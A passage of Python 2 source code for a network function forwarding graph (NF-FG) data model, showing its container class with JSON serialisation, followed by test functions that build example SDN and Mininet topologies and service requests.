if self.delay is not None:
link["delay"] = self.delay
if self.bandwidth is not None:
link["bandwidth"] = self.bandwidth
sg_path = self.sg_path[:]
if sg_path:
link['sg_path'] = sg_path
return link
def load (self, data, container=None, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:param container: main container object
:type container: :any:`NFFGModel`
:return: None
"""
if container is None:
raise RuntimeError(
"Container reference is not given for edge endpoint lookup!")
for link in container.edge_reqs:
if link.id == data['id']:
raise RuntimeError("ID conflict during EdgeReq loading: %s" % link.id)
super(EdgeReq, self).load(data=data, container=container)
self.delay = float(data['delay']) if 'delay' in data else None
self.bandwidth = float(data['bandwidth']) if 'bandwidth' in data else None
if 'sg_path' in data:
self.sg_path = data['sg_path']
return self
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "ReqLink(id: %s, src: %s[%s], dst: %s[%s], path: %s, delay:%s, " \
"bandwidth: %s)" % (
self.id, self.src.node.id, self.src.id, self.dst.node.id,
self.dst.id, self.sg_path, self.delay, self.bandwidth)
################################################################################
# --------========== MAIN CONTAINER STARTS HERE =========-------------
################################################################################
class NFFGParseError(RuntimeError):
"""
Exception class for specific parsing errors.
"""
pass
class NFFGModel(Element):
"""
Wrapper class for a single NF-FG.
Network Function Forwarding Graph (NF-FG) data model.
"""
# Default version
VERSION = "1.0"
"""Default version"""
# Namespace
NAMESPACE = "http://csikor.tmit.bme.hu/netconf/unify/nffg"
"""Namespace"""
# prefix
PREFIX = "nffg"
"""prefix"""
# Organization
ORGANIZATION = "BME-TMIT"
"""Organization"""
# Description
DESCRIPTION = "Network Function Forwarding Graph (NF-FG) data model"
"""Description"""
# Container type
TYPE = "NFFG"
__slots__ = ('name', 'service_id', 'version', 'metadata', 'mode', 'node_nfs',
'node_saps', 'node_infras', 'edge_links', 'edge_sg_nexthops',
'edge_reqs')
def __init__ (self, id=None, name=None, service_id=None, metadata=None,
mode=None, status=None, version=None):
"""
Init.
:param id: optional NF-FG identifier (generated by default)
:type id: str or int
:param name: optional NF-FG name
:type name: str
:param service_id: service id this NFFG is originated from
:type service_id: str or int
:param version: optional version (default: 1.0)
:type version: str
:return: None
"""
super(NFFGModel, self).__init__(id=id, type=self.TYPE, status=status)
self.name = name
self.service_id = service_id
self.version = version if version is not None else self.VERSION
self.metadata = OrderedDict(metadata if metadata else ())
self.mode = mode
self.node_nfs = []
self.node_saps = []
self.node_infras = []
self.edge_links = []
self.edge_sg_nexthops = []
self.edge_reqs = []
@property
def nodes (self):
"""
    Return all the nodes in the Container as a list.
:return: nodes
:rtype: list
"""
# shallow copy
nodes = self.node_nfs[:]
nodes.extend(self.node_saps)
nodes.extend(self.node_infras)
return nodes
@property
def edges (self):
"""
Return all the edges in the Container as a list.
:return: edges
:rtype: list
"""
# shallow copy
edges = self.edge_links[:]
edges.extend(self.edge_reqs)
edges.extend(self.edge_sg_nexthops)
return edges
def get_port (self, node_id, port_id):
"""
Return the Port reference according to the given Node and Port ids.
:param node_id: node id
:type node_id: str
:param port_id: port id
:type port_id: str
:return: port object
:rtype: :any:`Port`
"""
for node in self.nodes:
if node.id == node_id:
for port in node.ports:
if port.id == port_id:
return port
return None
def add_nf (self, **kwargs):
"""
Create and store a NF Node with the given parameters.
:return: the created NF
:rtype: :any:`NodeNF`
"""
nf = NodeNF(**kwargs)
for node in self.node_nfs:
if node.id == nf.id:
        raise RuntimeError(
          "NodeNF with id: %s already exists in the container!" % node.id)
self.node_nfs.append(nf)
return nf
def del_nf (self, id):
"""
Remove the NF Node with the given id.
:param id: NF id
    :type id: str
:return: the actual Node is found and removed or not
:rtype: bool
"""
for node in self.node_nfs:
if node.id == id:
self.node_nfs.remove(node)
return True
def add_sap (self, **kwargs):
"""
Create and store a SAP Node with the given parameters.
:return: the created SAP
:rtype: :any:`NodeSAP`
"""
sap = NodeSAP(**kwargs)
for node in self.node_saps:
if node.id == sap.id:
        raise RuntimeError(
          "NodeSAP with id: %s already exists in the container!" % node.id)
self.node_saps.append(sap)
return sap
def del_sap (self, id):
"""
Remove the SAP Node with the given id.
:param id: SAP id
    :type id: str
:return: the actual Node is found and removed or not
:rtype: bool
"""
for node in self.node_saps:
if node.id == id:
self.node_saps.remove(node)
return True
def add_infra (self, **kwargs):
"""
Create and store an Infrastructure Node with the given parameters.
:return: the created Infra
:rtype: :any:`NodeInfra`
"""
infra = NodeInfra(**kwargs)
for node in self.node_infras:
if node.id == infra.id:
        raise RuntimeError(
          "NodeInfra with id: %s already exists in the container!" % node.id)
self.node_infras.append(infra)
return infra
def del_infra (self, id):
"""
Remove Infrastructure Node with the given id.
:param id: Infra id
    :type id: str
:return: the actual Node is found and removed or not
:rtype: bool
"""
for node in self.node_infras:
if node.id == id:
self.node_infras.remove(node)
return True
def add_link (self, src, dst, **kwargs):
"""
    Create and store a Link Edge between the given src and dst ports.
    :param src: source port
    :type src: :any:`Port`
    :param dst: destination port
    :type dst: :any:`Port`
:return: the created edge
:rtype: :any:`EdgeLink`
"""
link = EdgeLink(src=src, dst=dst, **kwargs)
for edge in self.edge_links:
if edge.src.id == src.id and edge.dst.id == dst.id:
raise RuntimeError(
"EdgeLink with src(%s) and dst(%s) endpoints already exist in the "
"container!" % (src.id, dst.id))
self.edge_links.append(link)
return link
def del_link (self, src, dst):
"""
    Remove Link Edge with given src and dst ports.
    :param src: source port
    :type src: :any:`Port`
    :param dst: destination port
    :type dst: :any:`Port`
:return: the actual Edge is found and removed or not
:rtype: bool
"""
for edge in self.edge_links:
if edge.src.id == src.id and edge.dst.id == dst.id:
self.edge_links.remove(edge)
return True
def add_sg_hop (self, src, dst, **kwargs):
"""
    Create and store an SG next hop Edge between the given src and dst ports.
    :param src: source port
    :type src: :any:`Port`
    :param dst: destination port
    :type dst: :any:`Port`
:return: the created edge
:rtype: :any:`EdgeSGLink`
"""
hop = EdgeSGLink(src=src, dst=dst, **kwargs)
for edge in self.edge_sg_nexthops:
if edge.src.id == src.id and edge.dst.id == dst.id:
raise RuntimeError(
"EdgeSGLink with src(%s) and dst(%s) endpoints already exist in the "
"container!" % (src.id, dst.id))
self.edge_sg_nexthops.append(hop)
return hop
def del_sg_hop (self, src, dst):
"""
    Remove SG next hop Edge with given src and dst ports.
    :param src: source port
    :type src: :any:`Port`
    :param dst: destination port
    :type dst: :any:`Port`
:return: the actual Edge is found and removed or not
:rtype: bool
"""
for edge in self.edge_sg_nexthops:
if edge.src.id == src.id and edge.dst.id == dst.id:
self.edge_sg_nexthops.remove(edge)
return True
def add_req (self, src, dst, **kwargs):
"""
    Create and store a Requirement Edge between the given src and dst ports.
    :param src: source port
    :type src: :any:`Port`
    :param dst: destination port
    :type dst: :any:`Port`
:return: the created edge
:rtype: :any:`EdgeReq`
"""
req = EdgeReq(src=src, dst=dst, **kwargs)
for edge in self.edge_reqs:
if edge.src.id == src.id and edge.dst.id == dst.id:
raise RuntimeError(
"EdgeReq with src(%s) and dst(%s) endpoints already exist in the "
"container!" % (src.id, dst.id))
    self.edge_reqs.append(req)
return req
def del_req (self, src, dst):
"""
    Remove Requirement Edge with given src and dst ports.
    :param src: source port
    :type src: :any:`Port`
    :param dst: destination port
    :type dst: :any:`Port`
:return: the actual Edge is found and removed or not
:rtype: bool
"""
for edge in self.edge_reqs:
if edge.src.id == src.id and edge.dst.id == dst.id:
        self.edge_reqs.remove(edge)
return True
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
super(NFFGModel, self).persist()
nffg = OrderedDict(parameters=OrderedDict(id=self.id))
if self.name is not None:
nffg["parameters"]["name"] = self.name
if self.service_id is not None:
nffg["parameters"]["service_id"] = self.service_id
nffg["parameters"]["version"] = self.version
if self.metadata:
nffg["parameters"]["metadata"] = self.metadata
if self.mode:
nffg['parameters']['mode'] = self.mode
if self.node_nfs:
nffg["node_nfs"] = [nf.persist() for nf in self.node_nfs]
if self.node_saps:
nffg["node_saps"] = [sap.persist() for sap in self.node_saps]
if self.node_infras:
nffg["node_infras"] = [infra.persist() for infra in self.node_infras]
if self.edge_links:
nffg["edge_links"] = [link.persist() for link in self.edge_links]
if self.edge_sg_nexthops:
nffg["edge_sg_nexthops"] = [sg.persist() for sg in self.edge_sg_nexthops]
if self.edge_reqs:
nffg["edge_reqs"] = [req.persist() for req in self.edge_reqs]
return nffg
def load (self, raw_data, *args, **kwargs):
"""
Read the given JSON object structure and try to convert to an NF-FG
representation as an :any:`NFFGModel`.
    :param raw_data: raw data in JSON
:type raw_data: str
:return: the constructed NF-FG representation
:rtype: :any:`NFFGModel`
"""
# Converter function to avoid unicode
def unicode_to_str (input):
"""
Converter function to avoid unicode.
:param input: data part
:type input: unicode
:return: converted data
:rtype: str
"""
if isinstance(input, dict):
return OrderedDict(
[(unicode_to_str(key), unicode_to_str(value)) for key, value in
input.iteritems()])
elif isinstance(input, list):
return [unicode_to_str(element) for element in input]
elif isinstance(input, unicode):
# return input.encode('utf-8').replace(' ', '_')
return input.encode('utf-8')
else:
return input
try:
# Load from plain text
data = json.loads(raw_data, object_hook=unicode_to_str)
# Create container and fill container fields
container = NFFGModel(
id=data['parameters'].get('id'), # mandatory
name=data['parameters'].get('name'), # can be None
service_id=data['parameters'].get('service_id'), # can be None
metadata=data['parameters'].get('metadata'),
mode=data['parameters'].get('mode'),
status=data['parameters'].get('status'),
version=data['parameters'].get('version')) # mandatory
# Fill Container lists
for n in data.get('node_nfs', ()):
container.node_nfs.append(NodeNF.parse(data=n))
for n in data.get('node_saps', ()):
container.node_saps.append(NodeSAP.parse(data=n))
for n in data.get('node_infras', ()):
container.node_infras.append(NodeInfra.parse(data=n))
for e in data.get('edge_links', ()):
container.edge_links.append(EdgeLink.parse(data=e, container=container))
for e in data.get('edge_sg_nexthops', ()):
container.edge_sg_nexthops.append(
EdgeSGLink().parse(data=e, container=container))
for e in data.get('edge_reqs', ()):
container.edge_reqs.append(EdgeReq.parse(data=e, container=container))
except KeyError as e:
raise RuntimeError("Not a valid NFFGModel format!", e)
except ValueError as e:
raise NFFGParseError("Parsed data is not valid JSON: %s" % e)
return container
def dump (self):
"""
Dump the container in plain text based on JSON structure.
:return: NF-FG representation as plain text
:rtype: str
"""
return json.dumps(self.persist(), indent=2, sort_keys=False)
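# Illustrative sketch (hypothetical helper, not part of the original module):
# build a tiny NF-FG with the container API above and run it through a JSON
# round trip. Ids and the functional type are example values; note that
# add_link()/add_sg_hop()/add_req() expect Port objects, since Link.__init__
# only accepts ports as endpoints.
def _example_nffg_model_roundtrip ():
  nffg = NFFGModel(id="example-nffg", name="example")
  sap = nffg.add_sap(id="sap1")
  infra = nffg.add_infra(id="infra1")
  nf = nffg.add_nf(id="nf1", func_type="example-type")
  nffg.add_link(sap.add_port(1), infra.add_port(1), id="l1")
  nffg.add_link(infra.add_port(2), nf.add_port(1), id="l2", type=Link.DYNAMIC)
  raw = nffg.dump()            # plain JSON text
  return NFFGModel.parse(raw)  # rebuilds an equivalent container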
```
#### File: 5GExchange/nffg/nffg_tests.py
```python
import sys
from nffg import *
DOMAIN_INTERNAL = "INTERNAL"
DOMAIN_SDN = "SDN"
def test_parse_load ():
# NF
nf = NodeNF()
nf.id = "nf1"
nf.name = "NetworkFunction1"
nf.functional_type = "functype1"
nf.deployment_type = "virtual"
nf.resources.cpu = "10"
nf.resources.mem = "1"
nf.resources.storage = "10"
nf.resources.bandwidth = "2"
nf.resources.delay = "2"
# nf.add_port("port_nf1", "port1", "virtual", "vlan:1025")
p1 = nf.add_port(id="port_nf1",
properties={"port1": 42, "virtual": 24, "vlan": 1025})
# SAP
sap = NodeSAP()
sap.id = "sap1"
sap.name = "sap1"
p2 = sap.add_port(id="port_sap")
# Infra
infra = NodeInfra()
infra.id = "infra1"
infra.operation = Element.OP_CREATE
infra.name = "BisBis1"
infra.domain = "virtual"
infra.resources.cpu = "20"
infra.resources.mem = "2"
infra.resources.storage = "20"
infra.resources.bandwidth = "4"
infra.add_metadata("meta1", "lorem")
infra.add_metadata("meta2", "ipsum")
# infra.add_supported_type("functype1")
infra.add_supported_type(("functype1", "functype2", "functype3"))
# infra.resources.delay = "4"
p3 = port_infra = infra.add_port(id="port_infra")
port_infra.add_flowrule("match123", "action456")
# Edge link
edge_link = EdgeLink(p2, p3, id="link3")
edge_link.bandwidth = "100"
edge_link.delay = "5"
edge_link.backward = True
edge_link.operation = Element.OP_DELETE
# Edge SG next hop
edge_sg = EdgeSGLink(p1, p2, id="link1")
edge_sg.flowclass = "flowclass1"
# Edge requirement
edge_req = EdgeReq(p2, p3)
edge_req.id = "link2"
edge_req.bandwidth = "100"
edge_req.delay = "5"
edge_req.sg_path.append(edge_sg.id)
edge_req.sg_path.append(edge_link.id)
# Generate
nffg = NFFGModel()
nffg.name = "NFFG1"
nffg.metadata['lorem'] = 'ipsum'
nffg.node_infras.append(infra)
nffg.node_nfs.append(nf)
nffg.node_saps.append(sap)
nffg.edge_links.append(edge_link)
nffg.edge_sg_nexthops.append(edge_sg)
nffg.edge_reqs.append(edge_req)
data = nffg.dump()
print "\nGenerated NF-FG:"
print data
nffg2 = NFFGModel.parse(data)
print "\nParsed NF-FG:"
print nffg2.dump()
return nffg
def test_NFFG ():
# Add nodes
nffg = NFFG(id="BME-001")
infra = nffg.add_infra(id="node0", name="INFRA0")
sap0 = nffg.add_sap(id="SAP1")
sap1 = nffg.add_sap(id="SAP2")
nf1 = nffg.add_nf(id="NF1", name="NetFunc1")
nf2 = nffg.add_nf(id="NF2", name="NetFunc2")
nf3 = nffg.add_nf(id="NF3", name="NetFunc3")
# Add ports and edges
nffg.add_link(sap0.add_port(1), infra.add_port(0), id="infra_in")
nffg.add_link(sap1.add_port(1), infra.add_port(1), id="infra_out")
nffg.add_link(infra.add_port(2), nf1.add_port(1), id="nf1_in", dynamic=True)
nffg.add_link(nf1.add_port(2), infra.add_port(3), id="nf1_out", dynamic=True)
nffg.add_link(infra.add_port(4), nf2.add_port(1), id="nf2_in", dynamic=True)
nffg.add_link(nf2.add_port(2), infra.add_port(5), id="nf2_out", dynamic=True)
nffg.add_link(infra.add_port(6), nf3.add_port(1), id="nf3_in", dynamic=True)
nffg.add_link(nf3.add_port(2), infra.add_port(7), id="nf3_out", dynamic=True)
# Add SG hops
nffg.add_sglink(sap0.ports[1], nf1.ports[1], id="hop1")
nffg.add_sglink(nf1.ports[2], nf2.ports[1], id="hop2")
nffg.add_sglink(nf2.ports[2], nf3.ports[1], id="hop3")
nffg.add_sglink(nf3.ports[1], sap1.ports[1], id="hop4")
nffg.add_sglink(sap1.ports[1], sap0.ports[1], id="hop_back")
# Add req
nffg.add_req(sap0.ports[1], sap1.ports[1], id="req", delay=10, bandwidth=100)
# Dump NetworkX structure
from pprint import pprint
print "\nNetworkX:"
pprint(nffg.network.__dict__)
# Dump NFFGModel structure
print "\nNFFGModel:"
nffg_dump = nffg.dump()
print nffg_dump
# Dump tests
print "\nNFs:"
for nf in nffg.nfs:
print nf
print "\nSG next hops:"
for hop in nffg.sg_hops:
print hop
# Parse NFFG
print "\nParsed NF-FG:"
print NFFG.parse(nffg_dump).dump()
# Copy test
print "Copied NF-FG:"
# pprint(nffg.copy().network.__dict__)
pprint(copy.deepcopy(nffg).network.__dict__)
def generate_mn_topo ():
# Create NFFG
nffg = NFFG(id="INTERNAL", name="Internal-Mininet-Topology")
# Add environments
ee1 = nffg.add_infra(id="EE1", name="ee-infra-1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
ee2 = nffg.add_infra(id="EE2", name="ee-infra-2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
# Add supported types
ee1.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
ee2.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
# Add OVS switches
sw3 = nffg.add_infra(id="SW3", name="switch-3", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sw4 = nffg.add_infra(id="SW4", name="switch-4", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
# Add SAPs
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap14.domain = "eth0"
# Add links
link_res = {'delay': 1.5, 'bandwidth': 10}
nffg.add_link(ee1.add_port(1), sw3.add_port(1), id="mn-link1", **link_res)
nffg.add_link(ee2.add_port(1), sw4.add_port(1), id="mn-link2", **link_res)
nffg.add_link(sw3.add_port(2), sw4.add_port(2), id="mn-link3", **link_res)
nffg.add_link(sw3.add_port(3), sap1.add_port(1), id="mn-link4", **link_res)
nffg.add_link(sw4.add_port(3), sap2.add_port(1), id="mn-link5", **link_res)
nffg.add_link(sw4.add_port(4), sap14.add_port(1), id="mn-link6", **link_res)
# nffg.duplicate_static_links()
return nffg
def generate_mn_topo2 ():
# Create NFFG
nffg = NFFG(id="INTERNAL2", name="Internal-Mininet-Topology2")
# Add environments
ee1 = nffg.add_infra(id="EE11", name="ee-infra-11", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
ee2 = nffg.add_infra(id="EE12", name="ee-infra-12", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
# Add supported types
ee1.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
ee2.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
# Add OVS switches
sw3 = nffg.add_infra(id="SW13", name="switch-13", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sw4 = nffg.add_infra(id="SW14", name="switch-14", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
# Add SAPs
sap1 = nffg.add_sap(id="SAP3", name="SAP3")
sap2 = nffg.add_sap(id="SAP4", name="SAP4")
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap14.domain = "eth0"
# Add links
link_res = {'delay': 1.5, 'bandwidth': 10}
nffg.add_link(ee1.add_port(1), sw3.add_port(1), id="mn-link11", **link_res)
nffg.add_link(ee2.add_port(1), sw4.add_port(1), id="mn-link12", **link_res)
nffg.add_link(sw3.add_port(2), sw4.add_port(2), id="mn-link13", **link_res)
nffg.add_link(sw3.add_port(3), sap1.add_port(1), id="mn-link14", **link_res)
nffg.add_link(sw4.add_port(3), sap2.add_port(1), id="mn-link15", **link_res)
nffg.add_link(sw4.add_port(4), sap14.add_port(1), id="mn-link16", **link_res)
# nffg.duplicate_static_links()
return nffg
def generate_dynamic_fallback_nffg ():
nffg = NFFG(id="DYNAMIC-FALLBACK-TOPO", name="fallback-dynamic")
nc1 = nffg.add_infra(id="nc1", name="NC1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
nc2 = nffg.add_infra(id="nc2", name="NC2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
nc1.add_supported_type(['A', 'B'])
nc2.add_supported_type(['A', 'C'])
s3 = nffg.add_infra(id="s3", name="S3", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
s4 = nffg.add_infra(id="s4", name="S4", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sap1 = nffg.add_sap(id="sap1", name="SAP1")
sap2 = nffg.add_sap(id="sap2", name="SAP2")
linkres = {'delay': 1.5, 'bandwidth': 2000}
nffg.add_link(nc1.add_port(1), s3.add_port(1), id="l1", **linkres)
nffg.add_link(nc2.add_port(1), s4.add_port(1), id="l2", **linkres)
nffg.add_link(s3.add_port(2), s4.add_port(2), id="l3", **linkres)
nffg.add_link(s3.add_port(3), sap1.add_port(1), id="l4", **linkres)
nffg.add_link(s4.add_port(3), sap2.add_port(1), id="l5", **linkres)
nffg.duplicate_static_links()
return nffg
def generate_static_fallback_topo ():
nffg = NFFG(id="STATIC-FALLBACK-TOPO", name="fallback-static")
s1 = nffg.add_infra(id="s1", name="S1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
s2 = nffg.add_infra(id="s2", name="S2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
s3 = nffg.add_infra(id="s3", name="S3", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
s4 = nffg.add_infra(id="s4", name="S4", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
sap1 = nffg.add_sap(id="sap1", name="SAP1")
sap2 = nffg.add_sap(id="sap2", name="SAP2")
nffg.add_link(s1.add_port(1), s3.add_port(1), id="l1")
nffg.add_link(s2.add_port(1), s4.add_port(1), id="l2")
nffg.add_link(s3.add_port(2), s4.add_port(2), id="l3")
nffg.add_link(s3.add_port(3), sap1.add_port(1), id="l4")
nffg.add_link(s4.add_port(3), sap2.add_port(1), id="l5")
nffg.duplicate_static_links()
return nffg
def generate_one_bisbis ():
nffg = NFFG(id="1BiSBiS", name="One-BiSBiS-View")
bb = nffg.add_infra(id="1bisbis", name="One-BiSBiS",
domain=NFFG.DEFAULT_DOMAIN,
infra_type=NFFG.TYPE_INFRA_BISBIS)
# FIXME - very basic heuristic for virtual resource definition
# bb.resources.cpu = min((infra.resources.cpu for infra in
# self.global_view.get_resource_info().infras))
# bb.resources.mem = min((infra.resources.cpu for infra in
# self.global_view.get_resource_info().infras))
# bb.resources.storage = min((infra.resources.cpu for infra in
# self.global_view.get_resource_info().infras))
# bb.resources.delay = min((infra.resources.cpu for infra in
# self.global_view.get_resource_info().infras))
# bb.resources.bandwidth = min((infra.resources.cpu for infra in
# self.global_view.get_resource_info().infras))
bb.resources.cpu = sys.maxint
bb.resources.mem = sys.maxint
bb.resources.storage = sys.maxint
bb.resources.delay = 0
bb.resources.bandwidth = sys.maxint
sap1 = nffg.add_sap(id="sap1", name="SAP1")
sap2 = nffg.add_sap(id="sap2", name="SAP2")
nffg.add_link(sap1.add_port(1), bb.add_port(1), id='link1')
nffg.add_link(sap2.add_port(1), bb.add_port(2), id='link2')
nffg.duplicate_static_links()
return nffg
def generate_mn_test_req ():
test = NFFG(id="SG-decomp", name="SG-name")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR", func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1, storage=0)
fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), comp.add_port(1), id=1)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=2)
test.add_sglink(decomp.ports[1], sap2.add_port(1), id=3)
test.add_sglink(sap2.ports[1], fwd.add_port(1), id=4)
test.add_sglink(fwd.ports[1], sap1.ports[1], id=5)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2, 3))
test.add_req(sap2.ports[1], sap1.ports[1], bandwidth=4, delay=20,
sg_path=(4, 5))
return test
def generate_mn_test_req2 ():
test = NFFG(id="SG-decomp", name="SG-name")
sap1 = test.add_sap(name="SAP3", id="sap3")
sap2 = test.add_sap(name="SAP4", id="sap4")
comp = test.add_nf(id="comp", name="COMPRESSOR", func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1, storage=0)
fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), comp.add_port(1), id=1)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=2)
test.add_sglink(decomp.ports[1], sap2.add_port(1), id=3)
test.add_sglink(sap2.ports[1], fwd.add_port(1), id=4)
test.add_sglink(fwd.ports[1], sap1.ports[1], id=5)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2, 3))
test.add_req(sap2.ports[1], sap1.ports[1], bandwidth=4, delay=20,
sg_path=(4, 5))
return test
def generate_mn_req_hackathon ():
test = NFFG(id="SG-hackathon", name="SG-name")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap3 = test.add_sap(name="SAP3", id="sap3")
comp = test.add_nf(id="comp", name="COMPRESSOR", func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1, storage=0)
fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), comp.add_port(1), id=1)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=2)
test.add_sglink(decomp.ports[1], sap3.add_port(1), id=3)
test.add_sglink(sap3.ports[1], fwd.add_port(1), id=4)
test.add_sglink(fwd.ports[1], sap1.ports[1], id=5)
test.add_req(sap1.ports[1], sap3.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2, 3))
test.add_req(sap3.ports[1], sap1.ports[1], bandwidth=4, delay=20,
sg_path=(4, 5))
return test
def gen ():
nffg = NFFG(id="SG-decomp", name="SG-name")
sap1 = nffg.add_sap(name="SAP1", id="sap1")
sap2 = nffg.add_sap(name="SAP2", id="sap2")
nc1 = nffg.add_infra(id="nc1", name="NC1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
nc2 = nffg.add_infra(id="nc2", name="NC2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
comp = nffg.add_nf(id="comp", name="COMPRESSOR", func_type="headerCompressor",
cpu=2, mem=2, storage=0)
decomp = nffg.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=2, mem=2, storage=0)
linkres = {'delay': 1.5, 'bandwidth': 2000}
nffg.add_link(sap1.add_port(1), nc1.add_port(1), id="l1", **linkres)
nffg.add_link(nc1.add_port(2), nc2.add_port(2), id="l2", **linkres)
nffg.add_link(nc2.add_port(1), sap2.add_port(1), id="l3", **linkres)
nffg.duplicate_static_links()
nffg.add_undirected_link(nc1.add_port(), comp.add_port(1), dynamic=True)
nffg.add_undirected_link(nc1.add_port(), comp.add_port(2), dynamic=True)
nffg.add_undirected_link(nc2.add_port(), decomp.add_port(1), dynamic=True)
nffg.add_undirected_link(nc2.add_port(), decomp.add_port(2), dynamic=True)
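# Note (added for readability, assuming the internal domain's TAG/UNTAG
# convention): the flowrules below wire the static inter-node ports to the
# most recently added dynamic NF ports -- tagged traffic arriving on a static
# port is untagged and forwarded to the NF side, and traffic coming back from
# the NF is re-tagged and sent out the static port again.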
nc1.ports[1].add_flowrule(match="in_port=1;TAG=sap1-comp-139956882597136",
action="output=%s;UNTAG" % nc1.ports.container[
-1].id)
nc2.ports[2].add_flowrule(match="in_port=2;UNTAG",
action="output=%s;TAG=sap1-comp-139956882597136" %
nc2.ports.container[-1].id)
p1 = nc1.ports.container[-1].id
# nc1.ports[p1].add_flowrule(match="in_port=%s;TAG=comp-sap1-%s" % (p1, 42),
# action="output=%s;UNTAG" % 1)
nc1.ports[p1].add_flowrule(match="in_port=%s;" % p1,
action="output=%s;TAG=comp-sap1-%s" % (1, 42))
p2 = nc2.ports.container[-1].id
nc2.ports[p2].add_flowrule(match="in_port=%s;TAG=comp-sap1-%s" % (p2, 42),
action="output=%s;" % 1)
return nffg
def generate_sdn_topo ():
# Create NFFG
nffg = NFFG(id="SDN", name="SDN-Topology")
# Add MikroTik OF switches
mt1 = nffg.add_infra(id="MT1", name="MikroTik-SW-1", domain=DOMAIN_SDN,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
mt2 = nffg.add_infra(id="MT2", name="MikroTik-SW-2", domain=DOMAIN_SDN,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
mt1.resources.delay = 0.2
mt1.resources.bandwidth = 4000
mt2.resources.delay = 0.2
mt2.resources.bandwidth = 4000
# Add SAPs
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap24 = nffg.add_sap(id="SAP24", name="SAP24")
sap34 = nffg.add_sap(id="SAP34", name="SAP34")
# Add links
l1 = nffg.add_link(mt1.add_port(1), mt2.add_port(1), id="sdn-link1")
l2 = nffg.add_link(sap14.add_port(1), mt1.add_port(2), id="sdn-link2")
mt1.add_port(3)
mt1.add_port(4)
l3 = nffg.add_link(mt2.add_port(2), sap24.add_port(1), id="sdn-link3")
l4 = nffg.add_link(mt2.add_port(3), sap34.add_port(1), id="sdn-link4")
mt2.add_port(4)
l1.delay = 0.1
l1.bandwidth = 1000
l2.delay = 1.5
l2.bandwidth = 1000
l3.delay = 1.5
l3.bandwidth = 1000
l4.delay = 1.5
